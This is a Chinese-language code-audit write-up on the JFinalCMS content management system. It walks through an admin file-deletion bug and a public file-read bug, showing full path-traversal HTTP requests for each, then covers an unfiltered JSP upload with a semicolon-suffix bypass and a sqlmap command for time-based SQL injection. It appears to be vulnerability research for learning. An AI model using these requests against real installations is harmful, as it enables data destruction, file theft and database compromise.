Java代码审计之JFinalCMS

朋友们现在只对常读和星标的公众号才展示大图推送，建议大家把“亿人安全“设为星标”，否则可能就看不到了啦

原文首发在先知社区

https://xz.aliyun.com/t/14957

前言

看到星球发布了一个作业，由于考试没及时弄。所以就自己随便看看了，这套系统确实漏洞很多，可以说是靶场。。。危险操作几乎都没有做过滤，而且很久没更新了

后台任意文件删除

这个洞提了cve，看大家都在水我也水一个

漏洞很简单，甚至不需要白盒，黑盒能直接测出来，但是代码审计还是看代码吧，我审这个的时候也是直接看的代码，代码位置在src/main/java/com/cms/controller/admin/DatabaseController.java 文件下的/delete 接口

跟进这个delete方法

可以看到对这个参数没有做任何的检测，仅仅只看了文件是否存在

poc如下

POST /admin/database/delete HTTP/1.1
Host: 127.0.0.1:8888
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=6DD997E088E0DCBF8F72AF2897F1B845
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

name=../../../../../../../../flag.txt

执行后

然后就是issue上的一些漏洞了，学习一下

前台任意文件读取

也是文件名没有做任何过滤，直接可以读取成功

payload如下

GET /common/file/download?fileKey=../../../../../../../flag.txt HTTP/1.1
Host: 127.0.0.1:8888
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

任意文件上传

这个也是issue里面的

在文件com/cms/controller/admin/FileController.java 下存在任意文件上传

中间唯一的检验是一个水印相关的

if(config.getIsWatermarkEnabled() && ArrayUtils.contains(imageSuffixs, suffix.toLowerCase())){
            String watermarkImage = config.getWatermarkImage();
            String watermarkPosition = config.getWatermarkPosition();
            File watermarkImageFile = new File(PathUtils.getWebRootPath()+watermarkImage);
            String sourceFileName = newFileBaseName+"_source."+suffix;
            File sourceFile = new File(PathUtils.getWebRootPath()+"/"+CommonConstant.UPLOAD_PATH+"/"+sourceFileName);
            newFile.renameTo(sourceFile);
            ImageUtils.addWatermark(sourceFile, newFile, watermarkImageFile, watermarkPosition);
            FileUtils.deleteQuietly(sourceFile);
        }

这个if无所谓，即使不执行也能正常上传

因为有些表单的处理懒得写，所以直接抓上传包即可

可以看到直接上传成功了，但是springboot是不能解析jsp的，所以这样上传了也没用，访问是直接下载，不知道那个issue是怎么处理的，后面看了一下用tomcat启动部署即可解析jsp，但是多了一个if需要绕过

仔细看了一下那个issue，那个是没有下面这句代码的，应该是作者更新了一下，且if逻辑处理稍微不一样

UploadFile uploadFile = getFile();

issue代码如下

没想到什么绕过方法，另外jfinal默认不允许直接访问jsp文件，这种绕过直接加个分号即可，即1.jsp;

这个是我手动创建的，传是传不了一点，如果有大佬知道怎么绕还请指点一二

SQL注入

在springboot中使用了mybatis-plus，但是在这个项目的JFinal版本并没有使用，所以在一些接口造成了sql注入

首先是在com/cms/controller/admin/AdminController.java 文件下

这里index接口即默认接口，接收的三个参数都进入了findPage方法，直接跟进这个方法

可以看到三个参数都直接进入了sql语句中无任何过滤，这里因为编码的原因导致布尔盲注回显结果不是很准确所以直接用延时注入即可

放sqlmap跑一下即可

python sqlmap.py -u http://127.0.0.1:8081/admin/admin?name=r --dbs --cookie JSESSIONID=ABB781F07C8BD899D6B9BCE286EAA9F0 --batch

其它地方还有很多，都是直接用了findPage方法，没有做处理就不一个个看了